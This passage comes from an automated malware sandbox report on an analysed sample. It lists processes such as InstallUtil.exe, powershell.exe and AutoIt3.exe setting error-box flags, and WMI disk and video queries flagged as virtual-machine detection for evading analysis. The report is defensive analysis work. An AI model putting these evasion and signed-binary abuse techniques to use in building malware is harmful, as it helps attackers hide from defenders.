Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ahdccea\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 5030000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 28F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2720000 memory reserve \| memory write watch

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
